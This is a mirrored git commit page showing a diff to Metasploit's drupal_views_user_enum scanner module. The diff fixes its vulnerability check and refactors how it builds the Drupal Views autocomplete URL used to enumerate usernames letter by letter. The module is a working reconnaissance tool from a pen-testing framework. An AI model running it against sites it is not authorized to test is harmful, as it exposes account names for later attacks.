infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Land #3990, @wchen-r7's fix for #3984, a busted check in drupal_views_user_enum

bug/bundler_fix
Jon Hart 2014-10-12 19:38:55 -07:00
parent 458da2bca4 260aa8dc22
commit d51d2bf5a0
No known key found for this signature in database
GPG Key ID: 2FA9F0A3AFA8E9D3
1 changed files with 13 additions and 19 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

32
modules/auxiliary/scanner/http/drupal_views_user_enum.rb
View File

@ -35,11 +35,15 @@ class Metasploit3 < Msf::Auxiliary
register_options(
[
OptString.new('PATH', [true, "Drupal Path", "/"])
OptString.new('TARGETURI', [true, "Drupal Path", "/"])
], self.class)
end
def check(base_uri)
def base_uri
@base_uri ||= "#{normalize_uri(target_uri.path)}?q=admin/views/ajax/autocomplete/user/"
end
def check_host(ip)
res = send_request_cgi({
'uri' => base_uri,
'method' => 'GET',
@ -47,31 +51,21 @@ class Metasploit3 < Msf::Auxiliary
}, 25)
if not res
return false
return Exploit::CheckCode::Unknown
elsif res and res.body =~ /\<title\>Access denied/
# This probably means the Views Module actually isn't installed
print_error("#{rhost} - Access denied")
return false
vprint_error("#{rhost} - Access denied")
return Exploit::CheckCode::Safe
elsif res and res.message != 'OK' or res.body != '[ ]'
return false
return Exploit::CheckCode::Safe
else
return true
return Exploit::CheckCode::Appears
end
end
def run_host(ip)
# Make sure the URIPATH begins with '/'
datastore['PATH'] = normalize_uri(datastore['PATH'])
# Make sure the URIPATH ends with /
if datastore['PATH'][-1,1] != '/'
datastore['PATH'] = datastore['PATH'] + '/'
end
enum_uri = datastore['PATH'] + "?q=admin/views/ajax/autocomplete/user/"
# Check if remote host is available or appears vulnerable
if not check(enum_uri)
unless check_host(ip) == Exploit::CheckCode::Appears
print_error("#{ip} does not appear to be vulnerable, will not continue")
return
end
@ -83,7 +77,7 @@ class Metasploit3 < Msf::Auxiliary
vprint_status("Iterating on letter: #{l}")
res = send_request_cgi({
'uri' => enum_uri+l,
'uri' => base_uri+l,
'method' => 'GET',
'headers' => { 'Connection' => 'Close' }
}, 25)